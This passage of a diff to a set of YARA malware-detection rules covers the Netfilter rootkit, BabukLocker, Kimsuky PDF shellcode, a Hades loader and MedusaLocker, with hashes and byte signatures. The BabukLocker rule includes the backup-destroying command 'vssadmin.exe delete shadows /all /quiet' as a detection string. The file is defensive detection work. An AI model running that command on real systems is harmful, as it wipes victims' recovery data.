e0 7f 66 89 05 f4 07 02 00 0f b7 05 ef 07 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e1 07 02 00 b8 01 00 00 00 66 0f 6e c8 8d 50 05 66 0f d1 c1 66 0f db c2 f3 0f 7f 05 c7 07 02 00 0f }
+		$s4 = { 48 89 9c 24 60 06 00 00 48 89 b4 24 68 06 00 00 48 89 bc 24 70 06 00 00 4c 89 b4 24 30 06 00 00 c7 05 2e 1a 02 00 04 00 00 00 48 c7 05 27 1a 02 00 01 00 00 00 4c 89 2d 2c 1a 02 00 ff 15 22 48 01 00 48 8d 35 8b 04 02 00 66 66 66 0f 1f 84 00 00 00 00 00 33 d2 44 89 6c 24 70 41 b8 08 03 00 00 48 8d 8d 10 02 00 00 45 8b f5 e8 e4 28 00 00 4c 8d 0d 5d 03 02 00 48 89 74 24 20 ba 84 01 00 00 48 8d 8d 10 02 00 00 49 c7 c0 ff ff ff ff e8 a0 fb ff ff 48 8d 54 24 70 48 8d 8d 10 02 00 00 e8 9f 05 00 00 8b d0 85 }
+		$s5 = { 4c 89 6c 24 60 4c 8d 05 25 cc 01 00 4c 89 6c 24 58 48 8d 15 e1 04 02 00 4c 89 6c 24 50 41 b9 ff 01 0f 00 4c 89 6c 24 48 48 8b cf 4c 89 6c 24 40 48 89 74 24 38 44 89 6c 24 30 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 ff 15 19 46 01 00 48 8b d8 ff 15 a8 46 01 00 8b f0 48 85 db 74 22 48 8b cb ff 15 20 46 01 00 48 8b cb ff 15 ff 45 01 00 48 8b cf ff 15 f6 45 01 00 bf 01 00 00 }
+		$s6 = { 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 f4 46 01 00 48 8b f8 48 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Decaf_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Netfilter_Dropper_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect Decaf ransomware (unpacked UPX)"
+		description = "Detect the dropper of Netfilter rootkit"
 		author = "Arkbird_SOLG"
-		id = "d19b2d31-a6c5-5033-ba43-4e9ccabc37bb"
-		date = "2021-11-01"
-		modified = "2021-11-02"
-		reference = "https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Decaf/RAN_Decaf_Nov_2021_1.yara#L1-L19"
+		id = "5e67c99c-6b08-5190-9c8a-55086c20923e"
+		date = "2020-06-18"
+		modified = "2021-06-18"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_Dropper_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "5cea33d710d252b39bcd8ae227f52d10897b7fe58b1ff5226a1cb8cc094d600c"
+		logic_hash = "66e96304e097a0f6cd99cf77b20f61b8a0bcceaf8685a336c039a80947a08f78"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "088b4715bbe986deac972d551b88f178d43b191f5a71fbd4db3fb0810a233500"
-		hash2 = "5da2a2ebe9959e6ac21683a8950055309eb34544962c02ed564e0deaf83c9477"
+		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
+		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
+		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
+		tlp = "White"
+		adversary = "Chinese APT Group"
+
+	strings:
+		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
+		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
+		$s1 = "%s\\netfilter.sys" fullword ascii
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
+		$s3 = "\\\\.\\netfilter" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( all of ( $seq* ) or 2 of ( $s* ) )
+}
+rule ARKBIRD_SOLG_MAL_Netfilter_May_2021_1 : FILE
+{
+	meta:
+		description = "Detect Netfilter rootkit"
+		author = "Arkbird_SOLG"
+		id = "da333ed8-8cd3-5ae4-bce5-a43a227fdee3"
+		date = "2021-06-18"
+		modified = "2021-06-21"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_May_2021_1.yara#L1-L22"
+		license_url = "N/A"
+		logic_hash = "f219981af907f74e4d95f768d99b7fd877c8bfb00587d198a4b0e2c521c744e1"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
+		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
+		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
+		tlp = "White"
+		adversary = "Chinese APT Group"
+
+	strings:
+		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
+		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
+		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
+		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
+		$s1 = "%sc=%s" fullword ascii
+		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
+		$s3 = "NETIO.SYS" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
+}
+rule ARKBIRD_SOLG_Ran_Babuklockers_Jan_2021_1 : FILE
+{
+	meta:
+		description = "Detect the BabukLocker ransomware"
+		author = "Arkbird_SOLG"
+		id = "a3bad41d-59fb-564f-a352-ca38af582c08"
+		date = "2020-01-03"
+		modified = "2021-01-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-02/BabukLocker/Ran_BabukLockers_Jan_2021_1.yar#L1-L23"
+		license_url = "N/A"
+		logic_hash = "8939e408948dd7b17acdac5c6b5f50db24ec63f19937b8663a15f52b678d0065"
+		score = 50
+		quality = 75
+		tags = "FILE"
+		hash1 = "8203c2f00ecd3ae960cb3247a7d7bfb35e55c38939607c85dbdb5c92f0495fa9"
+		level = "Experimental"
+
+	strings:
+		$seq1 = { 55 8b ec 83 ec 14 a1 b0 81 40 00 33 c5 89 45 fc c7 45 f8 ff ff ff ff c7 45 f4 00 40 00 00 8d 45 f0 50 8b 4d 08 51 6a 13 6a 00 6a 02 e8 85 2b 00 00 85 c0 0f 85 a3 00 00 00 8b 55 f4 52 e8 ae 06 00 00 83 c4 04 89 45 08 83 7d 08 00 0f 84 81 00 00 00 8d 45 f4 50 8b 4d 08 51 8d 55 f8 52 8b 45 f0 50 e8 55 2b 00 00 85 c0 75 5c c7 45 ec 00 00 00 00 eb 09 8b 4d ec 83 c1 01 89 4d ec 8b 55 ec 3b 55 f8 73 40 8b 45 ec c1 e0 05 8b 4d 08 8b 54 01 0c 83 e2 02 74 14 8b 45 ec c1 e0 05 03 45  }
+		$seq2 = { 68 68 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 01 00 00 00 eb 58 68 74 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 00 00 00 00 eb 2b 68 80 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0a c7 85 b0 fd ff ff ff ff ff ff e9 55 ff ff ff 6a 00 6a 00 ff 15 a8 90 40 00 e8 aa 04 00 00 e8 05 }
+		$seq3 = { 83 c4 0c 68 f4 00 00 00 8d 85 f4 fd ff ff 50 68 88 22 40 00 ff 15 6c 90 40 00 68 98 22 40 00 8d 8d f4 fd ff ff 51 ff 15 c4 90 40 00 c7 85 ec fd ff ff 00 00 00 00 6a 00 68 80 00 00 00 6a 01 6a 00 6a 01 68 00 00 00 40 8d 95 f4 fd ff ff 52 ff 15 70 90 40 00 89 85 98 fd ff ff 83 bd 98 fd ff ff ff 0f 84 2e 03 00 00 6a 00 8d 85 ec fd ff ff 50 68 90 00 00 00 68 78 82 40 00 8b 8d 98 fd ff ff 51 ff 15 90 90 }
+		$s1 = "\\ecdh_pub_k.bin" fullword wide
+		$s2 = "ntuser.dat.log" fullword wide
+		$s3 = "cmd.exe" fullword ascii
+		$s4 = "/c vssadmin.exe delete shadows /all /quiet" fullword wide
+		$s5 = { 5c 00 5c 00 3f 00 5c 00 00 00 00 00 3a 00 00 00 98 2f }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 15KB and 2 of ( $seq* ) and 3 of ( $s* )
+}
+rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Shellcode_Aug_2021_1 : FILE
+{
+	meta:
+		description = "Detect Kimsuky shellcode used in fake PDF against South Korea"
+		author = "Arkbird_SOLG"
+		id = "0b8d514b-82b6-5106-a87a-0890be1850d5"
+		date = "2021-08-03"
+		modified = "2021-08-04"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Shellcode_Aug_2021_1.yara#L1-L23"
+		license_url = "N/A"
+		logic_hash = "432ae4d1e61aec51be03edf7767b1f05ea98d7cb7af90372a70f8ae86002f82a"
+		score = 50
+		quality = 75
+		tags = "FILE"
+		hash1 = "7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e"
+		hash2 = "359ab5e0b57da0307ca9472e5b225dcd0f9dc9bf2efd2f15b1ca45b78791b6bc"
+		hash3 = "5ea7a724d99fab3f05f50dccd57db59451334ac8640c532d426df319dad55c9e"
+		level = "Experimental"
 		tlp = "white"
-		adversary = "-"
+		adversary = "Kimsuky"
 
 	strings:
-		$s1 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8d 54 24 ?? 8b 5c 24 ?? 48 8d 74 24 ?? 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 48 89 5c 24 18 48 89 74 24 20 89 f8 48 89 44 24 28 48 c7 44 24 30 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 38 00 74 ?? 48 8b 54 24 ?? c6 82 e5 00 00 00 00 48 8b 54 24 ?? 31 c0 }
-		$s2 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 89 0c 24 48 89 44 24 08 44 0f 11 7c 24 10 48 c7 44 24 20 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 28 00 74 0a 48 8b 6c 24 ?? 48 83 c4 ?? c3 e8 [3] 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 }
-		$s3 = { 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 5c 24 58 48 83 3d [3] 00 00 75 73 48 8b 05 45 [2] 00 48 8d 0d 66 [2] 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 04 01 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 8b 44 24 18 48 85 c0 0f 84 6a 01 00 00 48 3d 04 01 00 00 0f 87 5e 01 00 00 48 8d 1d 1a [2] 00 c6 04 03 5c 4c 8d 40 01 4c 89 05 [3] 00 48 8b 44 24 50 48 8b 5c }
-		$s4 = { 48 89 44 24 40 c7 44 24 3c 00 00 00 00 48 8b 0d [3] 00 48 8d 54 24 3c 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 18 00 75 10 48 8b 44 24 40 8b 4c 24 68 48 8b 5c 24 60 eb 1d 48 8b 44 24 40 48 8b 5c 24 60 8b 4c 24 68 e8 8f 00 00 00 48 8b 6c 24 48 48 83 c4 50 c3 c7 44 24 38 00 00 00 00 48 8b 15 [3] 00 48 8d 74 24 38 48 89 14 24 48 89 44 24 08 48 89 5c 24 10 48 63 c1 48 89 44 24 18 48 89 74 24 20 48 c7 44 24 28 00 00 00 00 e8 }
-		$s5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 42 43 67 4b 43 41 51 45 41 }
+		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
+		$s1 = { 48 89 d4 57 e9 6f 22 47 16 ff ec 91 e6 7f a8 20 65 0c 43 db 53 7d e1 b6 }
+		$s2 = { 48 5e 64 35 50 98 b6 9b 63 9b 86 c1 1b f9 7f df f7 ea ea aa a6 31 78 f2 65 77 8e a6 bb }
+		$s3 = { ef a7 2c 5e 96 b8 84 06 66 b8 9e 54 cb 51 80 f1 66 35 65 69 0a 38 c5 35 7e 62 48 a2 18 c4 2b 76 0f ba 00 07 6a 2e c5 e3 71 66 ac 6d 12 f6 95 99 0b 37 a3 6c d1 5f 64 b3 fb 0e a0 8d f5 d9 f3 24 61 e9 18 c9 d9 6a a5 94 48 d3 5f e2 19 93 5a fe 33 99 e7 91 50 f5 8e 6e 5b 1d 07 1e 21 3c 2e 3c 7c bb 55 9f ad 2e 3c 7c 1f 1f }
+		$s4 = { b1 9a 3c f7 ce 9e 51 79 f2 c4 d9 13 3a a9 ee f0 95 3d fa be 86 ad cd ea d1 90 d4 4e 18 3a 51 58 b4 e9 97 b7 48 e5 62 32 36 5b 6c d8 ae a4 d2 1d b6 92 a7 af 67 15 c5 52 96 44 02 51 58 1c c7 1c a5 2f c3 28 d0 cf 56 10 f1 27 fd 1f 7e b7 9e 30 b5 9c e0 60 02 37 9e 44 4c 62 30 cb 36 2a a6 c4 f3 7c f1 5b 9e 25 73 d5 d4 f4 f0 fd 8a 1d 89 e1 9d 31 4b 59 ce 0c 33 b6 ab 4d 3b 5f a7 69 21 a0 42 11 13 f3 70 9f 27 33 b6 58 e7 38 49 2d 97 18 de bf c3 c2 97 35 4c 65 70 61 6a d7 1c 3e 7e f2 04 7e d1 39 bc a3 ad 5b 1e 51 65 0d 70 a5 4a 55 b3 89 d9 71 c7 1b 77 4f 15 41 0e 0a 09 28 ab 0d 14 43 af 55 f4 6c }
+		$s5 = { 91 42 d1 ed c0 be 73 73 3e 35 8f b4 8e 38 f9 97 ba f9 58 d6 8b 37 a8 82 29 e7 4d 35 ea e2 ba 48 e0 61 b5 a4 f6 d4 4b 90 6a 98 89 fb 81 39 8b 3b 18 de dc 9d b7 36 ec d2 f1 51 56 1a 10 d3 b5 6b b4 95 f9 1e 86 97 9c 71 d5 4b 9a fb 0c 89 ec 3c d4 1d ac 51 34 9f 63 4d 51 59 3c b1 11 7a cd 79 a0 7a d6 43 48 52 d6 9a 4f bb 70 9a f6 3d a5 8d 72 37 9c 5b 66 e8 37 b5 48 25 80 74 e3 c7 46 ae 45 47 8e b4 e5 e8 3a 52 cd d3 87 c1 67 27 d7 62 54 6e 52 86 71 c5 c1 9f 2c ee 31 fa 2e c9 6a 7b a0 60 50 9f 16 17 f9 45 cd d9 b5 00 78 e4 6c 6b b5 f2 8e e1 bd 00 7d 74 c5 a5 45 35 0c dc 79 9c 3d 82 6a 86 92 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 400KB and 4 of them
+		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Plugx_Thor_July_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Thor variant of PlugX (Variant 1)"
+		description = "Detect encoded Kimsuky shellcode used in fake PDF against South Korea"
 		author = "Arkbird_SOLG"
-		id = "5447e5df-0326-5987-905b-bfc49acee05a"
-		date = "2021-07-27"
-		modified = "2021-07-28"
-		reference = "https://unit42.paloaltonetworks.com/thor-plugx-variant/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-27/PlugX/Mal_PlugX_Thor_July_2021_1.yara#L1-L20"
+		id = "8df7090a-6583-5d25-92bd-422e6b4191f7"
+		date = "2021-08-03"
+		modified = "2021-08-04"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "f94e6cf8a1169526a438dfbf4d6b40f4ce0f6af6eee2e893fb138b81c4172c73"
+		logic_hash = "54f549b92c232f789aff039c748f1f987e68e9ee10dfab309f2ecba16d574cdb"
+		score = 50
+		quality = 75
+		tags = "FILE"
+		hash1 = "83292ba7a1ddda6acf32181c693aa85b9e433fcb908a94ebccbed0f407a1a021"
+		hash2 = "512ad244c58064dfe102f27c9ec8814f3e3720593fe1e3ed48a8cb385d52ff84"
+		level = "Experimental"
+		tlp = "white"
+		adversary = "Kimsuky"
+
+	strings:
+		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
+		$s1 = { 78 9c ec bd 6b 97 eb 4a 72 25 f6 57 8e b5 96 67 75 4f 6b 24 f0 25 8f a6 d5 b3 16 59 00 6a c8 19 80 06 86 28 9b 65 d9 b3 7a 58 b7 59 97 3c ea 96 fb 21 92 90 fb bf 3b 76 64 c6 23 93 f5 38 47 6a 8f f5 41 1f ee ba c5 03 12 40 66 46 46 c6 63 c7 8e 7f f8 }
+		$s2 = { 94 fe 9b f1 c7 1f e8 e3 0f f4 f1 87 19 fd 37 ff f9 17 fc db 8f f4 ed e2 e7 5f fe 1b fe ff df 7e fc 8b df fe f0 f7 5f 7f 79 f8 e1 27 7f f9 7f fc 5f cb 7f f7 fc cb 7f 37 16 ff ee af ff f6 67 7f fb 97 7f fb b7 bf f8 3f ff f2 f8 e7 74 e3 9f fe fc cb e5 f5 c7 af 3f 7c f9 c9 8f 5f fe 06 3f f9 fa c3 af 8f bf 7f a5 87 d3 fd e9 26 bf 7f fd f1 }
+		$s3 = { b6 7c 2a db e2 39 ae 67 75 d9 ee 56 ab 7e 27 f2 b5 2e ba 61 3d a5 f5 88 f3 5b 3f f6 b4 b6 6d d1 c9 fb ae 9a 20 93 63 5c cf 69 73 6e a6 dd 4e d6 6b 98 f4 67 92 01 fa 9e 3d 6f 98 f7 95 3c ef eb aa 3f 37 85 bd ef 70 69 c6 ba ea 77 4f }
+		$s4 = { 4d 51 d7 5b 7d de f2 96 c8 0b dd bf d9 2d e9 7d 87 85 ec 87 b6 a4 cf 43 dc 1f 55 37 d2 fd 2b 95 df 20 6f 45 ab e3 e1 eb 24 df 71 ff 40 fe 69 3f }
+		$s5 = { 0f 35 fc 43 53 cf 03 67 d3 85 fb 51 b6 49 5f 40 fa 5d a2 3f 7d 31 fb 0b 3d 6f 53 69 ff 78 aa 37 e8 f3 12 fe 35 3e 43 90 7c 9c e3 73 a6 78 1c 9c 21 ec bf 20 df eb f0 5a b7 76 6f fb ad 96 53 57 0f a4 fc c3 6a f5 6d fe 41 fc 19 ed f7 4f 78 3a e9 1f f8 23 3d 2b 8d 2f 86 79 d6 7b b2 f8 e0 85 f2 51 25 fc 70 8c }
+
+	condition:
+		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
+}
+rule ARKBIRD_SOLG_Ran_Loader_Hades_Dec_2020_1 : FILE
+{
+	meta:
+		description = "Detect the loader used by Hades ransomware for load the final implant in memory"
+		author = "Arkbird_SOLG"
+		id = "d48d3a2b-3f0f-5da2-aba9-db2366489a6c"
+		date = "2020-12-27"
+		modified = "2021-01-01"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-01/Hades/Ran_Loader_Hades_Dec_2020_1.yar#L2-L24"
+		license_url = "N/A"
+		logic_hash = "cfa0f8acd3c526f7f4889794f7c38547a88031bb615a03ad5c1542c61bc0eecd"
+		score = 50
+		quality = 71
+		tags = "FILE"
+		hash1 = "0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00"
+		hash2 = "ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d"
+		level = "Experimental"
+
+	strings:
+		$seq1 = { 48 83 ec 58 8b 0d 9e aa 1c 00 ba 01 14 00 00 ff 15 93 9a 1c 00 48 85 c0 74 07 33 c0 e9 c1 3b 00 00 48 8b 05 58 99 1c 00 48 89 44 24 30 c7 44 24 3c 2c 01 00 00 c7 44 24 38 01 00 00 00 33 c9 ff 15 cb 99 1c 00 48 89 05 74 aa 1c 00 48 8b 05 6d aa 1c 00 48 63 48 3c 48 8b 05 62 aa 1c 00 48 03 c1 48 89 05 88 aa 1c 00 48 8d 44 24 3c 48 89 44 24 28 48 8d 05 a7 aa 1c 00 48 89 44 24 20 4c 8d 4c 24 38 45 33 c0 48 8d 15 53 aa 1c 00 48 8b 0d e4 ac 1c 00 ff 54 24 30 48 85 c0 74 05 e8 5e ff ff ff 48 8d 05 2d 3d 00 00 48 89 05 38 aa 1c 00 48 8b 05 31 aa 1c 00 }
+		$seq2 = { 89 54 24 10 89 4c 24 08 48 83 ec 18 8b 44 24 20 89 04 24 8b 44 24 28 89 44 24 04 8b 44 24 04 39 04 24 73 0f c7 44 24 20 04 00 00 00 8b 04 24 eb 0e eb 0c c7 44 24 20 35 00 00 00 8b 44 24 04 48 83 c4 18 }
+		$seq3 = { 48 8b 05 c1 ?? 1c 00 48 89 05 32 ?? 1c 00 }
+		$s1 = "111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}" fullword wide
+		$s2 = "_VERSION_INFO" fullword wide
+		$s3 = "VkKeyScanW" fullword ascii
+		$s4 = { 53 43 61 4d 69 72 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 2 of ( $seq* ) and 3 of ( $s* )
+}
+rule ARKBIRD_SOLG_RAN_Medusalocker_Aug_2021_1 : FILE
+{
+	meta:
+		description = "Detect MedusaLocker ransomware"
+		author = "Arkbird_SOLG"
+		id = "9e647371-b37a-53af-bfb6-cde72855b564"
+		date = "2021-08-08"
+		modified = "2021-08-08"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-08/medusalocker/RAN_MedusaLocker_Aug_2021_1.yara#L1-L29"
+		license_url = "N/A"
+		logic_hash = "40dd3ec16eefc59cb25c8855fb62cda1d642ec711226c1c964fd26384be7ef15"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		hash1 = "4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c"
+		hash2 = "212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887"
+		hash3 = "a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212"
+		hash4 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
+		hash5 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
+		hash6 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
+		tlp = "white"
+		adversary = "RaaS"
+
+	strings:
+		$s1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
